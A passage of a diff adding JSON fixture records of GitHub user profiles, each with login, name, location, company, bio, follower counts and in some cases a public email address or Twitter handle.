"MDQ6VXNlcjE1MDMxMjY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1223, + "fields": { + "nest_created_at": "2024-09-11T23:08:32.178Z", + "nest_updated_at": "2024-09-11T23:08:32.178Z", + "name": "James Holland", + "login": "hoggmania", + "email": "hoggmania@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1778197?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 10, + "public_gists_count": 5, + "public_repositories_count": 118, + "created_at": "2012-05-25T14:19:46Z", + "updated_at": "2024-09-06T07:50:17Z", + "node_id": "MDQ6VXNlcjE3NzgxOTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "j_w_holland" + } +}, +{ + "model": "github.user", + "pk": 1224, + "fields": { + "nest_created_at": "2024-09-11T23:08:35.519Z", + "nest_updated_at": "2024-09-11T23:08:35.520Z", + "name": "Mahesh Narayan", + "login": "mahenarayan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/154434373?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2023-12-20T12:27:41Z", + "updated_at": "2024-09-05T09:55:40Z", + "node_id": "U_kgDOCTR7RQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1225, + "fields": { + "nest_created_at": "2024-09-11T23:08:38.453Z", + "nest_updated_at": "2024-09-22T18:44:22.235Z", + "name": "Kjjj", + "login": "JingLeiTalan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92030419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-10-06T11:50:24Z", + "updated_at": "2024-07-02T13:49:43Z", + "node_id": "U_kgDOBXxF0w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1226, + "fields": { + "nest_created_at": "2024-09-11T23:08:39.674Z", + "nest_updated_at": "2024-09-11T23:17:31.197Z", + "name": "Taha Al Khashmany", + "login": "Taha-cmd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56194280?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2019-10-05T12:16:15Z", + "updated_at": "2024-09-05T12:08:19Z", + "node_id": "MDQ6VXNlcjU2MTk0Mjgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1227, + "fields": { + "nest_created_at": "2024-09-11T23:08:41.384Z", + "nest_updated_at": "2024-09-11T23:08:41.384Z", + "name": "Pedro Ferracini", + "login": "grgau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16718424?v=4", + "company": "University of Sao Paulo (USP)", + "location": "São José do Rio Preto, Brazil", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 19, + "public_gists_count": 1, + "public_repositories_count": 30, + "created_at": "2016-01-15T11:17:50Z", + "updated_at": "2024-05-03T04:29:42Z", + "node_id": "MDQ6VXNlcjE2NzE4NDI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1228, + "fields": { + "nest_created_at": "2024-09-11T23:08:43Z", + "nest_updated_at": "2024-09-22T18:44:06.298Z", + "name": "Sébastien Crocquesel", + "login": "scrocquesel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88554524?v=4", + "company": "@inulogic ", + "location": "Lyon, France", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2021-08-06T17:14:38Z", + "updated_at": "2024-09-22T17:57:04Z", + "node_id": "MDQ6VXNlcjg4NTU0NTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1229, + "fields": { + "nest_created_at": "2024-09-11T23:08:52.534Z", + "nest_updated_at": "2024-09-12T01:38:15.703Z", + "name": "", + "login": "evyaroshevich", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42962140?v=4", + "company": "Safe roads of Belarus", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2018-09-04T08:55:33Z", + "updated_at": "2024-05-15T15:05:17Z", + "node_id": "MDQ6VXNlcjQyOTYyMTQw", + "bio": "Lead Communications Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1230, + "fields": { + "nest_created_at": "2024-09-11T23:09:04.816Z", + "nest_updated_at": "2024-09-11T23:09:13.639Z", + "name": "Mohammed Aziz", + "login": "MohammedAziz02", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64214635?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2020-04-23T15:32:04Z", + "updated_at": "2024-08-28T22:28:14Z", + "node_id": "MDQ6VXNlcjY0MjE0NjM1", + "bio": "je suis Mohammed aziz, un élève ingénieur à l'école nationale des sciences appliquées d'Al hoceima.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1231, + "fields": { + "nest_created_at": "2024-09-11T23:09:05.640Z", + "nest_updated_at": "2024-09-11T23:09:06.442Z", + "name": "Peter Ivanov", + "login": "vveider", + "email": "mr.weider@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2734985?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2012-11-06T12:44:06Z", + "updated_at": "2024-09-05T10:59:56Z", + "node_id": "MDQ6VXNlcjI3MzQ5ODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1232, + "fields": { + "nest_created_at": "2024-09-11T23:09:12.363Z", + "nest_updated_at": "2024-09-11T23:09:12.363Z", + "name": "Lars", + "login": "3l73", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4559579?v=4", + "company": "", + "location": "Europe", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2013-05-29T12:26:38Z", + "updated_at": "2024-07-04T09:45:32Z", + "node_id": "MDQ6VXNlcjQ1NTk1Nzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1233, + "fields": { + "nest_created_at": "2024-09-11T23:09:14.473Z", + "nest_updated_at": "2024-09-11T23:09:14.473Z", + "name": "Durga Pasupuleti", + "login": "durga-pasupuleti", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22412654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2016-09-24T10:52:58Z", + "updated_at": "2024-06-13T19:51:59Z", + "node_id": "MDQ6VXNlcjIyNDEyNjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1234, + "fields": { + "nest_created_at": "2024-09-11T23:09:32.328Z", + "nest_updated_at": "2024-09-11T23:09:32.328Z", + "name": "", + "login": "pig837", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10391680?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-01-04T18:07:46Z", + "updated_at": "2024-08-14T07:41:53Z", + "node_id": "MDQ6VXNlcjEwMzkxNjgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1235, + "fields": { + "nest_created_at": "2024-09-11T23:09:33.998Z", + "nest_updated_at": "2024-09-11T23:09:33.998Z", + "name": "Erin McGill", + "login": "emcfins", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11314145?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 40, + "created_at": "2015-03-04T13:21:40Z", + "updated_at": "2024-05-17T19:16:33Z", + "node_id": "MDQ6VXNlcjExMzE0MTQ1", + "bio": "Cloud Artisan at AWS", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1236, + "fields": { + "nest_created_at": "2024-09-11T23:09:54.939Z", + "nest_updated_at": "2024-09-22T19:43:19.297Z", + "name": "Jan Kowalleck", + "login": "jkowalleck", + "email": "jan.kowalleck@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/2765863?v=4", + "company": "volunteer @OWASP @CycloneDX", + "location": "Nuremberg, Germany", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 36, + "public_gists_count": 2, + "public_repositories_count": 28, + "created_at": "2012-11-10T12:32:28Z", + "updated_at": "2024-09-18T14:32:01Z", + "node_id": "MDQ6VXNlcjI3NjU4NjM=", + "bio": "Software Engineer & Architect · OSS Author & Maintainer · @OWASP @CycloneDX Project Co-Lead", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1237, + "fields": { + "nest_created_at": "2024-09-11T23:09:57.007Z", + "nest_updated_at": "2024-09-22T18:44:24.714Z", + "name": "P Christopher Bowers", + "login": "pcbowers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41601975?v=4", + "company": "Liberty University", + "location": "Lynchburg, VA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 34, + "created_at": "2018-07-24T02:01:20Z", + "updated_at": "2024-01-31T02:45:50Z", + "node_id": "MDQ6VXNlcjQxNjAxOTc1", + "bio": "A systems admin by day and a web developer by any-free-time-I-get", + "is_hireable": false, + "twitter_username": "cferbowers" + } +}, +{ + "model": "github.user", + "pk": 1238, + "fields": { + "nest_created_at": "2024-09-11T23:10:04.123Z", + "nest_updated_at": "2024-09-22T20:29:04.013Z", + "name": "Tim Messing", + "login": "timmyteo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/141575989?v=4", + "company": "", + "location": "Denver, CO", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2023-08-06T16:42:49Z", + "updated_at": "2024-08-14T22:05:32Z", + "node_id": "U_kgDOCHBHNQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1239, + "fields": { + "nest_created_at": "2024-09-11T23:10:17.656Z", + "nest_updated_at": "2024-09-11T23:10:24.584Z", + "name": "", + "login": "arkajnag23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/176372362?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-07-23T07:16:07Z", + "updated_at": "2024-08-05T09:25:21Z", + "node_id": "U_kgDOCoM6ig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1240, + "fields": { + "nest_created_at": "2024-09-11T23:10:26.397Z", + "nest_updated_at": "2024-09-11T23:10:26.397Z", + "name": "John-David Dalton", + "login": "jdalton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4303?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 5392, + "public_gists_count": 2, + "public_repositories_count": 14, + "created_at": "2008-04-02T18:54:07Z", + "updated_at": "2024-09-03T21:41:28Z", + "node_id": "MDQ6VXNlcjQzMDM=", + "bio": "JavaScript tinkerer • Lodash creator • Bun engineer • TC39 delegate • Ex (Salesforce, Node core • Electron outreach WG • MS WebPlat+Chakra PM)", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1241, + "fields": { + "nest_created_at": "2024-09-11T23:10:36.056Z", + "nest_updated_at": "2024-09-18T18:55:48.826Z", + "name": "Michael Dong", + "login": "MCDong", + "email": "michaeldong1@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1039335?v=4", + "company": "", + "location": "Austin.tx", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 7, + "public_repositories_count": 20, + "created_at": "2011-09-09T18:25:47Z", + "updated_at": "2024-09-10T20:43:35Z", + "node_id": "MDQ6VXNlcjEwMzkzMzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1242, + "fields": { + "nest_created_at": "2024-09-11T23:15:43.488Z", + "nest_updated_at": "2024-09-22T19:40:55.784Z", + "name": "Lorenz Lo Sauer", + "login": "lsauer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/996117?v=4", + "company": "", + "location": "Europe", + "collaborators_count": 0, + "following_count": 43, + "followers_count": 25, + "public_gists_count": 125, + "public_repositories_count": 38, + "created_at": "2011-08-22T11:36:39Z", + "updated_at": "2024-09-15T08:45:51Z", + "node_id": "MDQ6VXNlcjk5NjExNw==", + "bio": "CTO eurosoft.uk\r\nA passion to design & architect solutions. Enthusiast of \"difficult\". Part of the Global Top 5% of Web & Desktop development. May I assist you?", + "is_hireable": true, + "twitter_username": "sauerlo" + } +}, +{ + "model": "github.user", + "pk": 1243, + "fields": { + "nest_created_at": "2024-09-11T23:15:45.145Z", + "nest_updated_at": "2024-09-22T18:44:38.598Z", + "name": "", + "login": "Mtothexmax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129895845?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2023-04-04T18:59:56Z", + "updated_at": "2024-09-11T21:47:00Z", + "node_id": "U_kgDOB74NpQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1244, + "fields": { + "nest_created_at": "2024-09-11T23:15:53.545Z", + "nest_updated_at": "2024-09-12T01:25:00.778Z", + "name": "Ravi Soni", + "login": "rvsoni", + "email": "rv.soni@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4734787?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 58, + "created_at": "2013-06-19T04:14:48Z", + "updated_at": "2024-07-27T04:17:46Z", + "node_id": "MDQ6VXNlcjQ3MzQ3ODc=", + "bio": "AWS Certified Solutions Architect with 15+ years of experience in design, maintenance, and migration of Java, JavaEE, Spring boot app development", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1245, + "fields": { + "nest_created_at": "2024-09-11T23:15:55.221Z", + "nest_updated_at": "2024-09-11T23:15:55.222Z", + "name": "Omachonu Ogali", + "login": "oogali", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/232224?v=4", + "company": "Ordinary Stack", + "location": "Princeton, NJ", + "collaborators_count": 0, + "following_count": 202, + "followers_count": 71, + "public_gists_count": 137, + "public_repositories_count": 61, + "created_at": "2010-03-28T21:42:47Z", + "updated_at": "2024-08-20T11:20:18Z", + "node_id": "MDQ6VXNlcjIzMjIyNA==", + "bio": "Always interested in technical problems that capture my attention. \r\n\r\nGo, Python, networking, and infrastructure automation.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1246, + "fields": { + "nest_created_at": "2024-09-11T23:15:56.071Z", + "nest_updated_at": "2024-09-22T18:44:43.468Z", + "name": "", + "login": "JoelJuaristi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60225391?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-01-23T14:29:45Z", + "updated_at": "2024-06-23T09:02:44Z", + "node_id": "MDQ6VXNlcjYwMjI1Mzkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1247, + "fields": { + "nest_created_at": "2024-09-11T23:16:11.080Z", + "nest_updated_at": "2024-09-22T18:49:20.272Z", + "name": "Robert Smigielski", + "login": "ptdropper", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7337269?v=4", + "company": "ptdropper at gmail dot com", + "location": "Allentown Pennsylvania", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 9, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2014-04-18T13:16:44Z", + "updated_at": "2024-09-19T12:17:19Z", + "node_id": "MDQ6VXNlcjczMzcyNjk=", + "bio": "Embedded software developer in the areas of medical devices, embedded telecommunication processors, writing software in C and many other languages", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1248, + "fields": { + "nest_created_at": "2024-09-11T23:16:20.990Z", + "nest_updated_at": "2024-09-22T19:42:52.110Z", + "name": "Niklas", + "login": "nscuro", + "email": "nscuro@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5693141?v=4", + "company": "", + "location": "Kiel, Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 58, + "public_gists_count": 4, + "public_repositories_count": 48, + "created_at": "2013-10-15T16:45:22Z", + "updated_at": "2024-09-17T18:01:34Z", + "node_id": "MDQ6VXNlcjU2OTMxNDE=", + "bio": "\"I have no idea why this works. You better don't touch it.\"", + "is_hireable": false, + "twitter_username": "nscur0" + } +}, +{ + "model": "github.user", + "pk": 1249, + "fields": { + "nest_created_at": "2024-09-11T23:16:41.425Z", + "nest_updated_at": "2024-09-11T23:16:41.425Z", + "name": "", + "login": "meto1111", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3693036?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-02-25T11:12:43Z", + "updated_at": "2022-11-02T11:54:21Z", + "node_id": "MDQ6VXNlcjM2OTMwMzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1250, + "fields": { + "nest_created_at": "2024-09-11T23:16:42.215Z", + "nest_updated_at": "2024-09-22T18:45:43.792Z", + "name": "", + "login": "nil4", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139133?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2009-10-13T10:44:53Z", + "updated_at": "2024-09-13T11:29:53Z", + "node_id": "MDQ6VXNlcjEzOTEzMw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1251, + "fields": { + "nest_created_at": "2024-09-11T23:16:43.847Z", + "nest_updated_at": "2024-09-12T00:08:00.539Z", + "name": "Daniel Nebenzahl", + "login": "dn-scribe", + "email": "dn@scribesecurity.com", + "avatar_url": "https://avatars.githubusercontent.com/u/85332941?v=4", + "company": "Scribe Security", + "location": "Israel", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2021-06-04T06:01:59Z", + "updated_at": "2024-08-10T18:28:04Z", + "node_id": "MDQ6VXNlcjg1MzMyOTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1252, + "fields": { + "nest_created_at": "2024-09-11T23:16:45.951Z", + "nest_updated_at": "2024-09-11T23:16:45.951Z", + "name": "", + "login": "tidepodz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55209256?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-09-11T19:04:28Z", + "updated_at": "2024-02-01T20:17:52Z", + "node_id": "MDQ6VXNlcjU1MjA5MjU2", + "bio": "Researcher at INL", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1253, + "fields": { + "nest_created_at": "2024-09-11T23:16:46.780Z", + "nest_updated_at": "2024-09-11T23:19:01.824Z", + "name": "", + "login": "lweitzel01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87398514?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-07-13T23:15:08Z", + "updated_at": "2023-03-09T20:09:32Z", + "node_id": "MDQ6VXNlcjg3Mzk4NTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1254, + "fields": { + "nest_created_at": "2024-09-11T23:16:47.600Z", + "nest_updated_at": "2024-09-11T23:16:47.600Z", + "name": "Jaykumar", + "login": "PentestInd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91212533?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-09-22T16:26:01Z", + "updated_at": "2024-08-01T14:21:11Z", + "node_id": "MDQ6VXNlcjkxMjEyNTMz", + "bio": "Pentester", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1255, + "fields": { + "nest_created_at": "2024-09-11T23:16:48.448Z", + "nest_updated_at": "2024-09-12T01:42:51.786Z", + "name": "", + "login": "flemminglau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25148089?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-01-16T09:15:23Z", + "updated_at": "2024-09-03T10:57:43Z", + "node_id": "MDQ6VXNlcjI1MTQ4MDg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1256, + "fields": { + "nest_created_at": "2024-09-11T23:16:49.250Z", + "nest_updated_at": "2024-09-11T23:16:54.186Z", + "name": "Kostiantyn", + "login": "kkovaletp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32730812?v=4", + "company": "Infinidat", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-10-12T07:34:23Z", + "updated_at": "2024-05-14T08:47:48Z", + "node_id": "MDQ6VXNlcjMyNzMwODEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1257, + "fields": { + "nest_created_at": "2024-09-11T23:16:50.905Z", + "nest_updated_at": "2024-09-11T23:16:50.905Z", + "name": "", + "login": "Adrian-Sevan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9453531?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-10-29T21:42:42Z", + "updated_at": "2023-09-16T08:04:51Z", + "node_id": "MDQ6VXNlcjk0NTM1MzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1258, + "fields": { + "nest_created_at": "2024-09-11T23:16:51.704Z", + "nest_updated_at": "2024-09-11T23:16:51.704Z", + "name": "Chris Clarkson", + "login": "ClarksonCJ", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3652990?v=4", + "company": "", + "location": "Leeds, UK", + "collaborators_count": 0, + "following_count": 342, + "followers_count": 41, + "public_gists_count": 3, + "public_repositories_count": 40, + "created_at": "2013-02-20T21:35:38Z", + "updated_at": "2024-07-31T09:44:54Z", + "node_id": "MDQ6VXNlcjM2NTI5OTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "ClarksonCJ" + } +}, +{ + "model": "github.user", + "pk": 1259, + "fields": { + "nest_created_at": "2024-09-11T23:16:52.534Z", + "nest_updated_at": "2024-09-11T23:16:52.534Z", + "name": "Alexander Mitte", + "login": "almitte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101641863?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-03-15T12:07:01Z", + "updated_at": "2024-09-11T04:35:43Z", + "node_id": "U_kgDOBg7uhw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1260, + "fields": { + "nest_created_at": "2024-09-11T23:16:53.374Z", + "nest_updated_at": "2024-09-11T23:16:53.374Z", + "name": "", + "login": "sycured", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60801403?v=4", + "company": "", + "location": "Worldwide (digital nomad)", + "collaborators_count": 0, + "following_count": 70, + "followers_count": 25, + "public_gists_count": 4, + "public_repositories_count": 87, + "created_at": "2020-02-08T00:46:04Z", + "updated_at": "2024-09-06T12:03:41Z", + "node_id": "MDQ6VXNlcjYwODAxNDAz", + "bio": "Consultant", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1261, + "fields": { + "nest_created_at": "2024-09-11T23:16:55.026Z", + "nest_updated_at": "2024-09-11T23:16:55.026Z", + "name": "Matthias", + "login": "gurucubano", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8157672?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-07-14T12:02:26Z", + "updated_at": "2024-09-04T16:22:16Z", + "node_id": "MDQ6VXNlcjgxNTc2NzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1262, + "fields": { + "nest_created_at": "2024-09-11T23:16:55.827Z", + "nest_updated_at": "2024-09-11T23:16:55.827Z", + "name": "hliu", + "login": "hliu168", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6569502?v=4", + "company": "", + "location": "Toronto, ON", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2014-02-02T19:56:06Z", + "updated_at": "2024-08-03T00:07:37Z", + "node_id": "MDQ6VXNlcjY1Njk1MDI=", + "bio": "B.Sc. Computer Engineering.\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1263, + "fields": { + "nest_created_at": "2024-09-11T23:16:57.063Z", + "nest_updated_at": "2024-09-11T23:16:57.063Z", + "name": "Robust", + "login": "usmankhanisb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39516394?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-05-22T08:30:22Z", + "updated_at": "2024-07-13T21:02:28Z", + "node_id": "MDQ6VXNlcjM5NTE2Mzk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1264, + "fields": { + "nest_created_at": "2024-09-11T23:16:58.746Z", + "nest_updated_at": "2024-09-11T23:16:58.746Z", + "name": "Kemal", + "login": "kemalmeler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17831255?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2016-03-14T15:11:14Z", + "updated_at": "2024-08-08T12:25:51Z", + "node_id": "MDQ6VXNlcjE3ODMxMjU1", + "bio": "", + "is_hireable": false, + "twitter_username": "kemalmeler" + } +}, +{ + "model": "github.user", + "pk": 1265, + "fields": { + "nest_created_at": "2024-09-11T23:16:59.558Z", + "nest_updated_at": "2024-09-11T23:19:44.829Z", + "name": "", + "login": "VijayB2606", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93205353?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-26T14:01:24Z", + "updated_at": "2024-06-13T11:27:50Z", + "node_id": "U_kgDOBY4zaQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1266, + "fields": { + "nest_created_at": "2024-09-11T23:17:01.683Z", + "nest_updated_at": "2024-09-11T23:19:56.147Z", + "name": "Gautam Beri", + "login": "gauti11", + "email": "gberi1@binghamton.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/6707006?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-02-17T16:36:48Z", + "updated_at": "2024-04-02T18:36:40Z", + "node_id": "MDQ6VXNlcjY3MDcwMDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1267, + "fields": { + "nest_created_at": "2024-09-11T23:17:03.360Z", + "nest_updated_at": "2024-09-11T23:17:03.360Z", + "name": "Georg M. Sorst", + "login": "georgms", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2857634?v=4", + "company": "@Nosto ", + "location": "AT", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 42, 